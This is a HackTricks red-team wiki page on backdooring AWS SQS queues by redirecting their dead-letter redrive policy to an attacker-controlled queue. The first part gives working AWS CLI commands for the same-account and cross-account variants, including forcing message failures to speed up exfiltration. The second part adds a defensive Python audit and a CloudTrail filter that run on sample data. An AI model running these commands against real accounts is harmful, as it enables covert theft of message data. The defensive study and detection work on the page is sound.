AWS - SQS DLQ Backdoor Persistence via RedrivePolicy/RedriveAllowPolicy
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Abuse SQS Dead-Letter Queues (DLQs) to covertly siphon data from a victim's source queue by pointing its RedrivePolicy at an attacker-controlled queue. With a small maxReceiveCount, and by triggering or simply waiting for normal processing failures, messages are moved automatically to the attacker's DLQ without changing producers or Lambda event source mappings.
Abused Permissions
- sqs:SetQueueAttributes on the victim source queue (to set RedrivePolicy)
- sqs:SetQueueAttributes on the attacker DLQ (to set RedriveAllowPolicy)
- Optional, to accelerate: sqs:ReceiveMessage on the source queue
- Optional, for setup: sqs:CreateQueue, sqs:SendMessage
Same-Account Flow (allowAll)
Setup (attacker account or compromised principal):
REGION=us-east-1
# 1) Create attacker DLQ
ATTACKER_DLQ_URL=$(aws sqs create-queue --queue-name ht-attacker-dlq --region $REGION --query QueueUrl --output text)
ATTACKER_DLQ_ARN=$(aws sqs get-queue-attributes --queue-url "$ATTACKER_DLQ_URL" --region $REGION --attribute-names QueueArn --query Attributes.QueueArn --output text)
# 2) Allow any same-account source queue to use this DLQ
aws sqs set-queue-attributes \
--queue-url "$ATTACKER_DLQ_URL" --region $REGION \
--attributes '{"RedriveAllowPolicy":"{\"redrivePermission\":\"allowAll\"}"}'
Execution (run as the compromised principal in the victim account):
# 3) Point victim source queue to attacker DLQ with low retries
VICTIM_SRC_URL=<victim source queue url>
ATTACKER_DLQ_ARN=<attacker dlq arn>
aws sqs set-queue-attributes \
--queue-url "$VICTIM_SRC_URL" --region $REGION \
--attributes '{"RedrivePolicy":"{\"deadLetterTargetArn\":\"'"$ATTACKER_DLQ_ARN"'\",\"maxReceiveCount\":\"1\"}"}'
Acceleration (optional):
# 4) If you also have sqs:ReceiveMessage on the source queue, force failures
for i in {1..2}; do \
aws sqs receive-message --queue-url "$VICTIM_SRC_URL" --region $REGION \
--max-number-of-messages 10 --visibility-timeout 0; \
done
# 5) Confirm messages appear in attacker DLQ
aws sqs receive-message --queue-url "$ATTACKER_DLQ_URL" --region $REGION \
--max-number-of-messages 10 --attribute-names All --message-attribute-names All
Example evidence (Attributes include DeadLetterQueueSourceArn):
{
  "MessageId": "...",
  "Body": "...",
  "Attributes": {
    "DeadLetterQueueSourceArn": "arn:aws:sqs:REGION:ACCOUNT_ID:ht-victim-src-..."
  }
}
Cross-Account Variant (byQueue)
Set RedriveAllowPolicy on the attacker DLQ so that only specific victim source queue ARNs may dead-letter into it:
VICTIM_SRC_ARN=<victim source queue arn>
aws sqs set-queue-attributes \
--queue-url "$ATTACKER_DLQ_URL" --region $REGION \
--attributes '{"RedriveAllowPolicy":"{\"redrivePermission\":\"byQueue\",\"sourceQueueArns\":[\"'"$VICTIM_SRC_ARN"'\"]}"}'
Impact
- Covert, durable data exfiltration/persistence: failed messages are routed automatically from the victim's SQS source queue to an attacker-controlled DLQ, with little operational noise and no changes to producers or Lambda mappings.
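The two settings this technique relies on (a RedrivePolicy whose deadLetterTargetArn points outside the expected set, a very low maxReceiveCount, and a DLQ whose RedriveAllowPolicy is allowAll) are all visible in queue attributes and in CloudTrail SetQueueAttributes events, so they are straightforward to audit. The following is an added example written for this page, not HackTricks code or an AWS tool: it inspects attribute dicts in the shape returned by `aws sqs get-queue-attributes` and flags the indicators above, and it filters CloudTrail records for SetQueueAttributes calls that touch either redrive attribute. The queue ARNs, account IDs, the approved-DLQ list and the CloudTrail records are constructed sample data; the requestParameters.attributes layout used for the CloudTrail check is an assumption about the event shape.

```python
"""Audit SQS redrive settings for DLQ-backdoor indicators (added example).

Works offline on constructed data; in a real account, feed it the
Attributes dict from `aws sqs get-queue-attributes --attribute-names
QueueArn RedrivePolicy RedriveAllowPolicy` for each queue.
"""
import json
from typing import Dict, Iterable, List, Set


def account_from_arn(arn: str) -> str:
    # arn:aws:sqs:REGION:ACCOUNT_ID:queue-name -> ACCOUNT_ID
    return arn.split(":")[4]


def audit_queue(queue_arn: str, attrs: Dict[str, str],
                approved_dlqs: Set[str], min_receive_count: int = 3) -> List[str]:
    """Return human-readable findings for one queue (empty list = clean)."""
    findings: List[str] = []
    src_account = account_from_arn(queue_arn)

    # Source-queue side: where do failed messages go, and how quickly?
    if attrs.get("RedrivePolicy"):
        policy = json.loads(attrs["RedrivePolicy"])
        target = policy.get("deadLetterTargetArn", "")
        max_rc = int(policy.get("maxReceiveCount", 0))  # AWS stores it as a string
        if account_from_arn(target) != src_account:
            findings.append(f"{queue_arn}: DLQ {target} is in another account")
        if target not in approved_dlqs:
            findings.append(f"{queue_arn}: DLQ {target} is not an approved DLQ")
        if max_rc < min_receive_count:
            findings.append(f"{queue_arn}: maxReceiveCount={max_rc} dead-letters "
                            f"messages after very few receives")

    # DLQ side: allowAll lets any same-account queue dead-letter into it
    if attrs.get("RedriveAllowPolicy"):
        allow = json.loads(attrs["RedriveAllowPolicy"])
        if allow.get("redrivePermission") == "allowAll":
            findings.append(f"{queue_arn}: RedriveAllowPolicy is allowAll")
    return findings


def audit_account(queues: Dict[str, Dict[str, str]], approved_dlqs: Set[str],
                  min_receive_count: int = 3) -> List[str]:
    out: List[str] = []
    for arn, attrs in queues.items():
        out.extend(audit_queue(arn, attrs, approved_dlqs, min_receive_count))
    return out


def flag_redrive_changes(events: Iterable[dict]) -> List[dict]:
    """Pick CloudTrail SetQueueAttributes records that change redrive settings.

    Assumes the changed attributes appear under requestParameters.attributes.
    """
    hits = []
    for ev in events:
        if ev.get("eventSource") != "sqs.amazonaws.com" or ev.get("eventName") != "SetQueueAttributes":
            continue
        changed = ev.get("requestParameters", {}).get("attributes", {})
        touched = sorted(k for k in changed if k in ("RedrivePolicy", "RedriveAllowPolicy"))
        if touched:
            hits.append({"queueUrl": ev["requestParameters"].get("queueUrl"),
                         "actor": ev.get("userIdentity", {}).get("arn"),
                         "attributes": touched})
    return hits


# ---- constructed sample data (fictional account IDs and queue names) ----
ACCT, OTHER = "111111111111", "999999999999"
SAMPLE_QUEUES = {
    f"arn:aws:sqs:us-east-1:{ACCT}:orders-src": {            # backdoored
        "RedrivePolicy": json.dumps({"deadLetterTargetArn": f"arn:aws:sqs:us-east-1:{OTHER}:ht-attacker-dlq",
                                     "maxReceiveCount": "1"})},
    f"arn:aws:sqs:us-east-1:{ACCT}:payments-src": {          # healthy
        "RedrivePolicy": json.dumps({"deadLetterTargetArn": f"arn:aws:sqs:us-east-1:{ACCT}:payments-dlq",
                                     "maxReceiveCount": "5"})},
    f"arn:aws:sqs:us-east-1:{ACCT}:payments-dlq": {          # scoped byQueue
        "RedriveAllowPolicy": json.dumps({"redrivePermission": "byQueue",
                                          "sourceQueueArns": [f"arn:aws:sqs:us-east-1:{ACCT}:payments-src"]})},
    f"arn:aws:sqs:us-east-1:{ACCT}:legacy-dlq": {            # over-permissive
        "RedriveAllowPolicy": json.dumps({"redrivePermission": "allowAll"})},
}
APPROVED_DLQS = {f"arn:aws:sqs:us-east-1:{ACCT}:payments-dlq"}
SAMPLE_EVENTS = [
    {"eventSource": "sqs.amazonaws.com", "eventName": "SetQueueAttributes",
     "userIdentity": {"arn": f"arn:aws:iam::{ACCT}:user/compromised-dev"},
     "requestParameters": {"queueUrl": f"https://sqs.us-east-1.amazonaws.com/{ACCT}/orders-src",
                           "attributes": {"RedrivePolicy": SAMPLE_QUEUES[f"arn:aws:sqs:us-east-1:{ACCT}:orders-src"]["RedrivePolicy"]}}},
    {"eventSource": "sqs.amazonaws.com", "eventName": "SetQueueAttributes",
     "userIdentity": {"arn": f"arn:aws:iam::{ACCT}:role/deploy"},
     "requestParameters": {"queueUrl": f"https://sqs.us-east-1.amazonaws.com/{ACCT}/payments-src",
                           "attributes": {"VisibilityTimeout": "60"}}},
    {"eventSource": "sqs.amazonaws.com", "eventName": "ReceiveMessage"},
]

if __name__ == "__main__":
    for line in audit_account(SAMPLE_QUEUES, APPROVED_DLQS):
        print("FINDING:", line)
    for hit in flag_redrive_changes(SAMPLE_EVENTS):
        print("CLOUDTRAIL:", hit)
```

The audit treats any DLQ outside an explicit allow-list as a finding rather than only cross-account targets, because the same-account allowAll variant on this page never leaves the victim account; the CloudTrail filter is the piece worth wiring into an alert, since a SetQueueAttributes call that writes RedrivePolicy or RedriveAllowPolicy from an unexpected principal is the one event this technique cannot avoid generating.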